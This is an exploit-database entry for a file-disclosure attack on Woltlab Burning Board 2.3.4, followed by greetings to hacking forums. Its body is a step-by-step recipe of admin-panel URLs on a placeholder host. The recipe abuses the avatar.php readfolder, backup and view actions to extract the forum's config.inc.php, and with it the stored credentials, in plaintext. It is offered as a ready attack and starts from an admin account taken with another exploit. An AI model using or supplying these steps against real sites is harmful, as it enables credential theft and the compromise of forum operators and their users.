Woltlab Burning Board 2.3.4 - File Disclosure

Author: sfx
type: webapps
platform: php
port: 
date_added: 2010-11-12 
date_updated: 2010-11-12 
verified: 0 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 

# Exploit Title: Woltlab Burning Board 2.3.4 File Disclosure Vulnerability
# Date: 2010-11-12
# Author: SFX
# Version: 2.3.4
# CVE : N/A

After you've used the Exploit to get the admin account:

goto: http://lolcathost/wbb/acp/avatar.php?action=readfolder

import: acp/lib

download a backup: http://lolcathost/wbb/acp/avatar.php?action=backup

goto: http://lolcathost/wbb/acp/avatar.php?action=view

search for: config.inc.php

after you know the name (for example avatar-17.php), goto the zip archive
and open avatar-17.php

that's the config.inc.php in plaintext

tested under 2.3.4, maybe other versions work too

Greetz to:
free-hack.com, back2hack.cc, hackerking, Omegavirus, BlackBerry, fred777,
Red Tiger, Samsa